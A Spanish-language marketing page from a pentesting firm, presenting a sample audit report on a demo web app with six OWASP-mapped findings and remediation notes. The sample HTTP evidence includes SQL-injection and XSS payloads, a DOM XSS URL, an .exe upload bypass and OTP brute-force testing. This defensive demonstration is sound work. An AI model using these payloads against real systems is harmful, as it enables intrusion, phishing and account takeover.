// Reporte DemoWeb

Conoce Nuestros Entregables

Experimenta la calidad de nuestros reportes de auditoría. Cada entregable combina análisis técnico profundo con insights generados por IA.

Solicita una demostración en: Contacto@tuinsignia.com

DEMOWEB REPORT — PENTESTING WEB

Reporte de Pruebas de Vulnerabilidades

Evaluación de Seguridad Web — Aplicación DemoWeb

5
Riesgo Alto
1
Riesgo Medio
6
Total Hallazgos
OWASP
Metodología

Aviso de alcance demo: esta evaluación fue una prueba demostrativa sin fines de lucro. Se realizó en entorno controlado para mostrar calidad de entregables, metodología y nivel de detalle técnico. No representa una auditoría contractual completa ni un dictamen final de seguridad.

Alcance de la Demo

Objetivo

Validar vulnerabilidades representativas y demostrar cómo INSIGNIA documenta hallazgos técnicos con impacto de negocio.

Cobertura

Revisión de flujos críticos web/API, controles de autenticación, exposición de datos y vectores de inyección priorizados.

Resultado

Reporte de ejemplo con severidad, evidencia, explicación técnica y recomendaciones accionables de remediación.

Metodología Resumida
Fase 01

Reconocimiento inicial y mapeo de rutas expuestas.

Fase 02

Pruebas manuales sobre validación, autenticación y control de acceso.

Fase 03

Explotación controlada y verificación de impacto real.

Fase 04

Documentación técnica con recomendaciones de mitigación.

Hallazgos Identificados
Bypass de Whitelist URL
A01:2025 — Broken Access Control
Alto

Se identificó que el campo "Enlace" implementa validación de dominios permitidos únicamente en frontend. Mediante interceptación HTTP con Burp Suite, fue posible inyectar dominios externos no autorizados que el servidor aceptó con HTTP 200 OK.

Evidencia Técnica (DemoWeb.com)
POST https://api.demoweb.com/v1/links/create
Authorization: Bearer eyJhbGciOi...
Content-Type: application/json

{
  "title": "Campaña Q4",
  "url": "https://secure-login-demo.attacker-demo.net"
}

Respuesta observada:
HTTP/1.1 200 OK
{
  "id": 88421,
  "status": "created",
  "publicUrl": "https://app.demoweb.com/r/88421"
}
Comportamiento Validado
Desde la UI (https://app.demoweb.com/campaigns/new) el campo bloquea dominios no permitidos.
Al reenviar la petición manipulada por proxy, backend persiste el valor sin validación server-side.
Impacto confirmado: redirección externa desde enlaces generados por usuarios internos.
Redirección a sitios maliciosos
Phishing dirigido a usuarios finales
Distribución de contenido fraudulento
Daño reputacional a la organización
Exposición de Información Sensible
A01:2025 — Broken Access Control
Alto

El endpoint /api/DemoWeb/Get expone el catálogo completo de usuarios incluyendo correos corporativos, UUIDs, roles e identificadores internos. El flujo de autenticación confirma la existencia de cuentas y expone GUIDs de sesión en mensajes de error.

Evidencia Técnica (Enumeración de Usuarios)
GET https://api.demoweb.com/v1/users?limit=200
Authorization: Bearer token_usuario_estandar

Respuesta observada:
HTTP/1.1 200 OK
{
  "items": [
    {"id":"u-1021","email":"ventas.norte@demoweb.com","role":"manager"},
    {"id":"u-1043","email":"soporte@demoweb.com","role":"operator"},
    {"id":"u-1107","email":"finance.lead@demoweb.com","role":"admin"}
  ]
}
Evidencia en Login
POST https://api.demoweb.com/v1/auth/login
{
  "email":"inexistente@demoweb.com",
  "password":"Test123!"
}

Respuesta: {"error":"USER_NOT_FOUND"}

POST con cuenta existente:
Respuesta: {"error":"INVALID_PASSWORD","trace":"sid=6f84f3f8-..."}

El mensaje diferencia cuentas válidas y facilita reconocimiento.
Enumeración masiva de usuarios
Exposición de estructura organizacional
Facilitación de ataques de phishing
Preparación de credential stuffing
Validación Insuficiente de Entradas
A05:2025 — Injection
Alto

Se detectaron múltiples campos que aceptan datos no sanitizados, permitiendo inyección de caracteres especiales y payloads que el servidor procesa sin filtrado adecuado. Las validaciones dependen exclusivamente de controles en la capa de presentación.

Evidencia Técnica (Payloads en API)
POST https://api.demoweb.com/v1/customers/create
Content-Type: application/json

{
  "name": "Cliente Demo'; DROP TABLE logs;--",
  "notes": "<svg/onload=alert('xss')>",
  "source": "web-form"
}

Respuesta:
HTTP/1.1 201 Created
{
  "customerId":"c-8829",
  "name":"Cliente Demo'; DROP TABLE logs;--"
}
Observación Funcional
El payload quedó persistido y se visualiza en el módulo:
https://app.demoweb.com/customers/c-8829

No se observaron filtros en backend ni codificación de salida consistente.
Inyección de datos maliciosos
Manipulación de flujos de negocio
Evasión de controles de seguridad
Persistencia de payloads en BD
Ausencia de Controles Rate Limiting
A07:2025 — Authentication Failures
Alto

El flujo de autenticación OTP permite solicitudes consecutivas ilimitadas sin fricción adicional. No existe rate limiting adaptativo, CAPTCHA, ni detección de abuso por IP o dispositivo, habilitando automatización de ataques.

Evidencia Técnica (Sin Rate Limiting)
POST https://api.demoweb.com/v1/auth/otp/request
{"email":"usuario.demo@demoweb.com"}

Prueba automatizada: 120 solicitudes / 2 minutos desde misma IP.
Resultado:
- 120 respuestas HTTP 200
- Sin bloqueo temporal
- Sin challenge CAPTCHA
- Sin header Retry-After
Evidencia de Verificación OTP
POST https://api.demoweb.com/v1/auth/otp/verify
{"email":"usuario.demo@demoweb.com","otp":"000000"}

Se permitieron múltiples intentos consecutivos sin escalado de controles.
No se observó lockout por cuenta ni por huella de dispositivo.
Denegación de servicio al usuario
Fuerza bruta sobre tokens OTP
Saturación del servicio SMTP
Enumeración de cuentas válidas
Carga de Archivos Restringidos
A02:2025 — Security Misconfiguration
Alto

Se logró cargar archivos .EXE y .DLL así como archivos de +2030 MB evadiendo las restricciones del frontend. La validación de tipo y tamaño se realiza únicamente en la capa cliente, permitiendo bypass mediante manipulación directa de peticiones HTTP multipart.

Evidencia Técnica (Bypass de Restricciones)
POST https://api.demoweb.com/v1/files/upload
Content-Type: multipart/form-data

file=@invoice_tool.exe;type=application/octet-stream
module=attachments

Respuesta:
HTTP/1.1 201 Created
{
  "fileId":"f-55120",
  "fileName":"invoice_tool.exe",
  "downloadUrl":"https://cdn.demoweb.com/files/f-55120"
}
Prueba de Tamaño
Archivo de prueba: backup_dump_2.1GB.bin
Resultado:
HTTP/1.1 201 Created
Persistencia confirmada en almacenamiento sin validación de límite máximo.
Distribución de malware
Riesgo de ejecución remota (RCE)
Denegación de servicio (DoS)
Compromiso reputacional
DOM-Based XSS
A05:2025 — Injection (CWE-79)
Medio

La aplicación lee location.pathname, lo decodifica y procesa en el cliente, permitiendo inyección de payloads XSS en la ruta. El uso de history.replaceState() facilita URLs maliciosas creíbles para campañas de phishing e ingeniería social. CVSS 3.1: 5.4

Evidencia Técnica (DOM XSS en Ruta)
URL de prueba:
https://app.demoweb.com/help/%3Cimg%20src=x%20onerror=alert(document.domain)%3E

Comportamiento observado:
El front procesa pathname y lo inyecta en componente breadcrumb sin sanitización estricta.
Se ejecuta JavaScript en contexto de app.demoweb.com.
Contexto de Riesgo
Con history.replaceState(), la URL queda visualmente legítima para usuario final.
Escenario plausible: enlace por correo interno simulando módulo de soporte de DemoWeb.
Phishing con URLs legítimas
Ejecución de JS en navegador
Robo de información de sesión
Encadenamiento con otros hallazgos

Limitaciones de esta prueba demo

  • No cubre la totalidad de activos ni todos los endpoints productivos.
  • No incluye validación de remediación posterior ni retesting formal.
  • Los hallazgos reflejan una muestra técnica representativa.
  • Para un diagnóstico final se requiere auditoría completa bajo alcance acordado.
Contenido del Reporte
Resumen Ejecutivo

Resumen Ejecutivo

Síntesis de hallazgos para la alta dirección con impacto de negocio y nivel de riesgo.

Detalle Técnico

Detalle Técnico

Descripción completa con evidencias, capturas de Burp Suite y pasos de reproducción.

Análisis IA

Análisis IA

Correlación de hallazgos y análisis de cadenas de ataque generado por ChatGPT y Claude.

Plan de Remediación

Plan de Remediación

Guía paso a paso con recomendaciones priorizadas alineadas a OWASP Top 10 2025.

CONTACTO PARA CLIENTES

Solicita una demostración

Si quieres conocer el nivel de detalle de nuestros entregables, esta sección acelera el contacto y nos ayuda a entender qué tipo de demo te interesa revisar.

  • Respuesta inicial en menos de 24 horas hábiles
  • Recomendación del servicio más adecuado para tu caso
  • Evaluación sobre aplicaciones web, APIs e infraestructura
  • Priorización de vulnerabilidades por impacto real
  • Reporte claro para negocio, TI y desarrollo
  • Contacto directo con el equipo de INSIGNIA

¿Quieres una evaluación completa para tu empresa?

Esta fue una demo sin fines de lucro. Solicita una auditoría formal con alcance contractual, explotación validada y plan de remediación priorizado.